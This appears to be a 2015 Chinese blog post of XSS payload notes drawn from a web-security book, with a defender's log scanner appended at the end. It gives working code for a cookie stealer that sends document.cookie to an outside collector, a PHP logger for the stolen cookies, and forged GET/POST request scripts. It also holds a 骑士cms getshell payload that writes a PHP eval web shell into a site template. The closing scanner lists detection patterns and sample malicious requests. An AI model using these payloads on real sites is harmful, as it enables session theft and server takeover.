Source: 自学PHP网 (zixuephp.com)  Date: 2015-04-17 13:03
XSS payloads can be written in any rich-client language; most use JavaScript, a few use ActionScript and the like.

1. Stealing cookies (cookie hijacking). Use the XSS vulnerability to insert cookie.js. Code of cookie.js:
```javascript
// Create a hidden image whose request carries the victim's cookies to the collector
var img = document.createElement("img");
img.src = "http://www.2cto.com/cookie.php?cookie=" + escape(document.cookie);
document.body.appendChild(img);
```
Code of cookie.php:
```php
<?php
// Append the received cookie value to a local file
$file = fopen("cookie.txt", "a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>
```
2. Constructing GET and POST requests. Code of get.js:
```javascript
// An image element issues the GET request when it is attached to the document
var img = document.createElement("img");
img.src = "一个可以使用的get请求链接"; // placeholder in the original: any usable GET request URL
document.body.appendChild(img);
```
Code of post.js. Code 1 (DOM-node approach):
```javascript
// Build a POST form with DOM calls, fill in two fields and submit it
var f = document.createElement("form");
f.action = "";
f.method = "post";
document.body.appendChild(f);

var i1 = document.createElement("input");
i1.name = "xxx";
i1.value = "xxxx";
f.appendChild(i1);

var i2 = document.createElement("input");
i2.name = "aaa";
i2.value = "aaa";
f.appendChild(i2);

f.submit();
```
Code 2:
```javascript
// Same idea, but the form is written as an HTML string via innerHTML
var dd = document.createElement("div");
document.body.appendChild(dd);
dd.innerHTML = '<form action="" method="post" id="xssform" name="mbform">' +
               '<input type="hidden" value="xxxx" name="xxx" />' +
               '<input type="text" value="aaaa" name="aaa" />' +
               '</form>';
document.getElementById("xssform").submit();
```
Code 3 (using XMLHttpRequest):
```javascript
// Wrapped in a function so that the early return is valid
(function () {
  var url = "http://lanu.sinaapp.com";
  var postStr = "aaa=aaaa&xxx=xxxx";
  var ajax = null;
  if (window.XMLHttpRequest) {
    ajax = new XMLHttpRequest();
  } else if (window.ActiveXObject) {
    ajax = new ActiveXObject("Microsoft.XMLHTTP"); // IE6 and older versions
  } else {
    return; // no XHR implementation available
  }
  ajax.open("POST", url, true);
  ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  //ajax.open("GET", url, true);
  //ajax.send(null);
  // Register the handler before send() so no state change is missed
  ajax.onreadystatechange = function () {
    if (ajax.readyState == 4 && ajax.status == 200) {
      //alert("Done!");
    }
  };
  ajax.send(postStr);
})();
```

-------------------

3. XSS phishing

4. Browser identification and detection of software installed by the user: http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/

5. CSS history hack: http://ha.ckers.org/weird/CSS-history-hack.html
Notes from reading 《白帽子讲web安全》 (White Hat Talks Web Security)

---------------------

XSS payload getshell example: 骑士cms getshell
```javascript
// Pre-built (URL-encoded) request body that writes a one-line (一句话) shell into the footer.php template
var Shelldata = 'tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6';

try {
  // Create the XMLHttpRequest (ActiveX fallback for old IE)
  var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP'));

  // Synchronous POST to the template editor's save action
  xml.open("POST", 'admin_templates.php?act=do_edit', false);
  xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xml.onreadystatechange = function () {
    if (xml.readyState == 4) {
      // response is ignored
    }
  };
  xml.send(Shelldata);
} catch (e) {
  // errors are swallowed
}
```

Author: L.N's blog
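As an added defender-side example (not from the original notes or the book), the following Node.js script scans access-log lines for the traces the payloads above leave in a request: an injected script tag or `document.cookie` in a query string, a forged form submission, and the percent-encoded `<?php eval(...)` body that the 骑士cms template-editor request carries. It percent-decodes repeatedly so double-encoded variants are still seen; the log lines, the host name `attacker.invalid` and the marker list are constructed assumptions.

```javascript
// Added example: flag requests carrying the payload markers discussed in these notes.
// Log lines and host names are constructed for the demo (attacker.invalid is a placeholder).
const SAMPLE_LOGS = [
  'GET /search.php?q=%3Cscript%20src%3D%22http%3A%2F%2Fattacker.invalid%2Fcookie.js%22%3E%3C%2Fscript%3E HTTP/1.1',
  'POST /admin_templates.php?act=do_edit HTTP/1.1 body=tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php',
  'GET /index.php?page=%253Cscript%253E HTTP/1.1', // double-encoded <script>
  'GET /search.php?q=php+tutorial HTTP/1.1',        // benign request
];

// Markers taken from the payloads in these notes (assumed list; extend as needed).
const MARKERS = [
  /<script\b/i,          // injected script tag
  /document\.cookie/i,   // cookie exfiltration (cookie.js)
  /<\?php/i,             // PHP code pushed into a template (getshell body)
  /\beval\s*\(/i,        // one-line shell body
  /\.submit\s*\(/i,      // forged form submission (post.js)
];

// Percent-decode up to maxRounds times so %253C (double-encoded "<") is still seen.
// A malformed escape stops decoding instead of throwing; what was decoded so far is kept.
function fullyDecode(text, maxRounds = 3) {
  let current = text.replace(/\+/g, ' ');
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (err) {
      break; // URIError on a malformed %-sequence
    }
    if (next === current) break; // nothing left to decode
    current = next;
  }
  return current;
}

// Returns the source of every marker that matches the decoded log line.
function findMarkers(logLine) {
  const decoded = fullyDecode(logLine);
  return MARKERS.filter((re) => re.test(decoded)).map((re) => re.source);
}

// Returns only the flagged lines, each with the markers that matched.
function scan(lines) {
  return lines
    .map((line) => ({ line, hits: findMarkers(line) }))
    .filter((r) => r.hits.length > 0);
}

for (const r of scan(SAMPLE_LOGS)) {
  console.log(`FLAGGED [${r.hits.join(', ')}] ${r.line}`);
}
```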